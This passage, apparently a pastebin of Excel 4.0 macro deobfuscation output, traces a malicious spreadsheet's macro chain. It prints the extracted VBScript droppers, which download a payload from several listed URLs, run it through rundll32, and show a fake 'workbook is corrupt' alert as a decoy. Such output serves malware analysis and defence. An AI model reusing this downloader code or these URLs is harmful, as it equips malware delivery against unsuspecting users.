  282. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  283. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  284. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  285. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  286. CELL:ID13925 , FullEvaluation , [FALSE]
  287. CELL:ID13926 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  288. CELL:ID13927 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  289. CELL:ID13928 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  290. CELL:ID13929 , FullEvaluation , IF(R13927C238<40000,,GOTO(R13940C238))
  291. CELL:ID13930 , FullEvaluation , "https://loughturnperceidrin.ml/wp-keys.php"
  292. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  293. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  294. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  295. CELL:ID13933 , FullEvaluation , [FALSE]
  296. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  297. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  298. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  299. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  300. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  301. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  302. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  303. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  304. CELL:FX20053 , FullEvaluation , [FALSE] GOTO(R47050C49)
  305. CELL:AW47050 , FullEvaluation , "=""C:\Users\Public\Clmu.html"""
  306. CELL:AW47051 , FullEvaluation , "=""C:\Users\Public\yP20iC8.vbs"""
  307. CELL:AW47052 , FullEvaluation , "=FOPEN(R2837C133,3)"
  308. CELL:AW47053 , FullEvaluation , "=FWRITELN(R2838C133,""whEoqhq = """"https://thepsaokhue.com/wp-keys.php"""""")"
  309. CELL:AW47054 , FullEvaluation , "=FWRITELN(R2838C133,""hiH = """"https://metagro.com.br/wp-keys.php"""""")"
  310. CELL:AW47055 , FullEvaluation , "=FWRITELN(R2838C133,""MQcR = """"https://loughturnperceidrin.ml/wp-keys.php"""""")"
  311. CELL:AW47056 , FullEvaluation , "=FWRITELN(R2838C133,""Ui5zK = """"https://joliroomlides.tk/wp-keys.php"""""")"
  312. CELL:AW47057 , FullEvaluation , "=FWRITELN(R2838C133,""u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)"")"
  313. CELL:AW47058 , FullEvaluation , "=FWRITELN(R2838C133,""Dim YB0zXti: Set YB0zXti = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  314. CELL:AW47059 , FullEvaluation , "=FWRITELN(R2838C133,""Function m987(data):"")"
  315. CELL:AW47060 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.setOption(2) = 13056"")"
  316. CELL:AW47061 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.Open """"GET"""", data, False"")"
  317. CELL:AW47062 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  318. CELL:AW47063 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.Send"")"
  319. CELL:AW47064 , FullEvaluation , "=FWRITELN(R2838C133,""m987 = YB0zXti.Status"")"
  320. CELL:AW47065 , FullEvaluation , "=FWRITELN(R2838C133,""End Function"")"
  321. CELL:AW47066 , FullEvaluation , "=FWRITELN(R2838C133,""For Each G2lS in u4d"")"
  322. CELL:AW47067 , FullEvaluation , "=FWRITELN(R2838C133,""If m987(G2lS) = 200 Then"")"
  323. CELL:AW47068 , FullEvaluation , "=FWRITELN(R2838C133,""Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""""ADODB.Stream"""")"")"
  324. CELL:AW47069 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Open"")"
  325. CELL:AW47070 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Type = 1"")"
  326. CELL:AW47071 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Write YB0zXti.ResponseBody"")"
  327. CELL:AW47072 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.SaveToFile """"""&R2836C133&"""""", 2"")"
  328. CELL:AW47073 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Close"")"
  329. CELL:AW47074 , FullEvaluation , "=FWRITELN(R2838C133,""Exit For"")"
  330. CELL:AW47075 , FullEvaluation , "=FWRITELN(R2838C133,""End If"")"
  331. CELL:AW47076 , FullEvaluation , "=FWRITELN(R2838C133,""Next"")"
  332. CELL:AW47077 , FullEvaluation , "=FCLOSE(R2838C133)"
  333. CELL:AW47078 , FullEvaluation , "=EXEC(""explorer.exe ""&R2837C133&"""")"
  334. CELL:AW47079 , FullEvaluation , "=WHILE(ISERROR(FILES(R2836C133)))"
  335. CELL:AW47080 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  336. CELL:AW47081 , FullEvaluation , "=NEXT()"
  337. CELL:AW47082 , FullEvaluation , "=FILE.DELETE(R2837C133)"
  338. CELL:AW47083 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  339. CELL:AW47084 , FullEvaluation , "=""C:\Users\Public\ZCC9G.vbs"""
  340. CELL:AW47085 , FullEvaluation , "=FOPEN(R2870C133,3)"
  341. CELL:AW47086 , FullEvaluation , "=""rundll32.exe"""
  342. CELL:AW47087 , FullEvaluation , "=R2836C133&"",DllRegisterServer"""
  343. CELL:AW47088 , FullEvaluation , "=""C:\Windows\System32"""
  344. CELL:AW47089 , FullEvaluation , "=FWRITELN(R2871C133,""Set vvaK = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  345. CELL:AW47090 , FullEvaluation , "=FWRITELN(R2871C133,""vvaK.Document.Application.ShellExecute """"""&R2872C133&"""""",""""""&R2873C133&"""""",""""""&R2874C133&"""""",Null,0"")"
  346. CELL:AW47091 , FullEvaluation , "=FCLOSE(R2871C133)"
  347. CELL:AW47092 , FullEvaluation , "=EXEC(""explorer.exe ""&R2870C133&"""")"
  348. CELL:AW47093 , FullEvaluation , "=GOTO(R20022C180)"
  349. CELL:AW47094 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.429305,'rtNGOD1P843zMOPdOj'!DG874)
  350. CELL:DG874 , FullEvaluation , FORMULA("=FORMULA(R[46175]C[-62],R[1961]C[22])",rtNGOD1P843zMOPdOj$DG$875:$DG$918)
  351. CELL:DG875 , FullEvaluation , FORMULA("=""C:\Users\Public\Clmu.html""",R[1961]C[22])
  352. CELL:DG876 , FullEvaluation , FORMULA("=""C:\Users\Public\yP20iC8.vbs""",R[1961]C[22])
  353. CELL:DG877 , FullEvaluation , FORMULA("=FOPEN(R2837C133,3)",R[1961]C[22])
  354. CELL:DG878 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""whEoqhq = """"https://thepsaokhue.com/wp-keys.php"""""")",R[1961]C[22])
  355. CELL:DG879 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""hiH = """"https://metagro.com.br/wp-keys.php"""""")",R[1961]C[22])
  356. CELL:DG880 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""MQcR = """"https://loughturnperceidrin.ml/wp-keys.php"""""")",R[1961]C[22])
  357. CELL:DG881 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Ui5zK = """"https://joliroomlides.tk/wp-keys.php"""""")",R[1961]C[22])
  358. CELL:DG882 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)"")",R[1961]C[22])
  359. CELL:DG883 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Dim YB0zXti: Set YB0zXti = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[1961]C[22])
  360. CELL:DG884 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Function m987(data):"")",R[1961]C[22])
  361. CELL:DG885 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.setOption(2) = 13056"")",R[1961]C[22])
  362. CELL:DG886 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.Open """"GET"""", data, False"")",R[1961]C[22])
  363. CELL:DG887 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[1961]C[22])
  364. CELL:DG888 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.Send"")",R[1961]C[22])
  365. CELL:DG889 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""m987 = YB0zXti.Status"")",R[1961]C[22])
  366. CELL:DG890 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""End Function"")",R[1961]C[22])
  367. CELL:DG891 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""For Each G2lS in u4d"")",R[1961]C[22])
  368. CELL:DG892 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""If m987(G2lS) = 200 Then"")",R[1961]C[22])
  369. CELL:DG893 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""""ADODB.Stream"""")"")",R[1961]C[22])
  370. CELL:DG894 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Open"")",R[1961]C[22])
  371. CELL:DG895 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Type = 1"")",R[1961]C[22])
  372. CELL:DG896 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Write YB0zXti.ResponseBody"")",R[1961]C[22])
  373. CELL:DG897 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.SaveToFile """"""&R2836C133&"""""", 2"")",R[1961]C[22])
  374. CELL:DG898 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Close"")",R[1961]C[22])
  375. CELL:DG899 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Exit For"")",R[1961]C[22])
  376. CELL:DG900 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""End If"")",R[1961]C[22])
  377. CELL:DG901 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Next"")",R[1961]C[22])
  378. CELL:DG902 , FullEvaluation , FORMULA("=FCLOSE(R2838C133)",R[1961]C[22])
  379. CELL:DG903 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R2837C133&"""")",R[1961]C[22])
  380. CELL:DG904 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R2836C133)))",R[1961]C[22])
  381. CELL:DG905 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[1961]C[22])
  382. CELL:DG906 , FullEvaluation , FORMULA("=NEXT()",R[1961]C[22])
  383. CELL:DG907 , FullEvaluation , FORMULA("=FILE.DELETE(R2837C133)",R[1961]C[22])
  384. CELL:DG908 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[1961]C[22])
  385. CELL:DG909 , FullEvaluation , FORMULA("=""C:\Users\Public\ZCC9G.vbs""",R[1961]C[22])
  386. CELL:DG910 , FullEvaluation , FORMULA("=FOPEN(R2870C133,3)",R[1961]C[22])
  387. CELL:DG911 , FullEvaluation , FORMULA("=""rundll32.exe""",R[1961]C[22])
  388. CELL:DG912 , FullEvaluation , FORMULA("=R2836C133&"",DllRegisterServer""",R[1961]C[22])
  389. CELL:DG913 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[1961]C[22])
  390. CELL:DG914 , FullEvaluation , FORMULA("=FWRITELN(R2871C133,""Set vvaK = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[1961]C[22])
  391. CELL:DG915 , FullEvaluation , FORMULA("=FWRITELN(R2871C133,""vvaK.Document.Application.ShellExecute """"""&R2872C133&"""""",""""""&R2873C133&"""""",""""""&R2874C133&"""""",Null,0"")",R[1961]C[22])
  392. CELL:DG916 , FullEvaluation , FORMULA("=FCLOSE(R2871C133)",R[1961]C[22])
  393. CELL:DG917 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R2870C133&"""")",R[1961]C[22])
  394. CELL:DG918 , FullEvaluation , FORMULA("=GOTO(R20022C180)",R[1961]C[22])
  395. CELL:DG919 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.454290,'rtNGOD1P843zMOPdOj'!EC2836)
  396. CELL:EC2836 , FullEvaluation , "C:\Users\Public\Clmu.html"
  397. CELL:EC2837 , FullEvaluation , "C:\Users\Public\yP20iC8.vbs"
  398. CELL:EC2838 , FullEvaluation , FOPEN("C:\Users\Public\yP20iC8.vbs",3)
  399. CELL:EC2839 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","whEoqhq = ""https://thepsaokhue.com/wp-keys.php""")
  400. CELL:EC2840 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","hiH = ""https://metagro.com.br/wp-keys.php""")
  401. CELL:EC2841 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","MQcR = ""https://loughturnperceidrin.ml/wp-keys.php""")
  402. CELL:EC2842 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Ui5zK = ""https://joliroomlides.tk/wp-keys.php""")
  403. CELL:EC2843 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)")
  404. CELL:EC2844 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Dim YB0zXti: Set YB0zXti = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  405. CELL:EC2845 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Function m987(data):")
  406. CELL:EC2846 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.setOption(2) = 13056")
  407. CELL:EC2847 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.Open ""GET"", data, False")
  408. CELL:EC2848 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
  409. CELL:EC2849 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.Send")
  410. CELL:EC2850 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","m987 = YB0zXti.Status")
  411. CELL:EC2851 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","End Function")
  412. CELL:EC2852 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","For Each G2lS in u4d")
  413. CELL:EC2853 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","If m987(G2lS) = 200 Then")
  414. CELL:EC2854 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""ADODB.Stream"")")
  415. CELL:EC2855 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Open")
  416. CELL:EC2856 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Type = 1")
  417. CELL:EC2857 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Write YB0zXti.ResponseBody")
  418. CELL:EC2858 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.SaveToFile ""C:\Users\Public\Clmu.html"", 2")
  419. CELL:EC2859 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Close")
  420. CELL:EC2860 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Exit For")
  421. CELL:EC2861 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","End If")
  422. CELL:EC2862 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Next")
  423. CELL:EC2863 , PartialEvaluation , FCLOSE("C:\Users\Public\yP20iC8.vbs")
  424. CELL:EC2864 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\yP20iC8.vbs")
  425. CELL:EC2865 , PartialEvaluation , WHILE(ISERROR(FILES(R2836C133)))
  426. CELL:EC2868 , PartialEvaluation , FILE.DELETE("C:\Users\Public\yP20iC8.vbs")
  427. CELL:EC2869 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  428. CELL:EC2870 , FullEvaluation , "C:\Users\Public\ZCC9G.vbs"
  429. CELL:EC2871 , FullEvaluation , FOPEN("C:\Users\Public\ZCC9G.vbs",3)
  430. CELL:EC2872 , FullEvaluation , "rundll32.exe"
  431. CELL:EC2873 , FullEvaluation , "C:\Users\Public\Clmu.html,DllRegisterServer"
  432. CELL:EC2874 , FullEvaluation , "C:\Windows\System32"
  433. CELL:EC2875 , FullEvaluation , FWRITE("C:\Users\Public\ZCC9G.vbs","Set vvaK = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  434. CELL:EC2876 , FullEvaluation , FWRITE("C:\Users\Public\ZCC9G.vbs","vvaK.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\Clmu.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  435. CELL:EC2877 , PartialEvaluation , FCLOSE("C:\Users\Public\ZCC9G.vbs")
  436. CELL:EC2878 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\ZCC9G.vbs")
  437. CELL:EC2879 , FullEvaluation , GOTO(R20022C180)
  438. CELL:FX20022 , End , CLOSE(FALSE)
  439. CELL:FX20032 , FullEvaluation , [FALSE] GOTO(R20022C180)
  440. CELL:FX20022 , End , CLOSE(FALSE)
  441.  
  442. Files:
  443.  
  444. Files: path C:\Users\Public\Oyi.vbs, access 3
  445. On Error Resume Next
  446. Set fqaeA = CreateObject("WScript.Shell")
  447. Set YtU9AS = CreateObject("Scripting.FileSystemObject")
  448. Set pZ93bgn = YtU9AS.CreateTextFile("C:\Users\Public\a8FML.txt", True)
  449. pZ93bgn.WriteLine(fqaeA.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
  450. pZ93bgn.Close
  451.  
  452.  
  453. Files: path C:\Users\Public\yP20iC8.vbs, access 3
  454. whEoqhq = "https://thepsaokhue.com/wp-keys.php"
  455. hiH = "https://metagro.com.br/wp-keys.php"
  456. MQcR = "https://loughturnperceidrin.ml/wp-keys.php"
  457. Ui5zK = "https://joliroomlides.tk/wp-keys.php"
  458. u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)
  459. Dim YB0zXti: Set YB0zXti = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  460. Function m987(data):
  461. YB0zXti.setOption(2) = 13056
  462. YB0zXti.Open "GET", data, False
  463. YB0zXti.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  464. YB0zXti.Send
  465. m987 = YB0zXti.Status
  466. End Function
  467. For Each G2lS in u4d
  468. If m987(G2lS) = 200 Then
  469. Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject("ADODB.Stream")
  470. Txq2NpoZ.Open
  471. Txq2NpoZ.Type = 1
  472. Txq2NpoZ.Write YB0zXti.ResponseBody
  473. Txq2NpoZ.SaveToFile "C:\Users\Public\Clmu.html", 2
  474. Txq2NpoZ.Close
  475. Exit For
  476. End If
  477. Next
  478.  
  479.  
  480. Files: path C:\Users\Public\ZCC9G.vbs, access 3
  481. Set vvaK = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  482. vvaK.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\Clmu.html,DllRegisterServer","C:\Windows\System32",Null,0
  483.  
  484.  
  485. [END of Deobfuscation]
  486. time elapsed: 4.536201238632202
  487.  
  488. Process finished with exit code 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!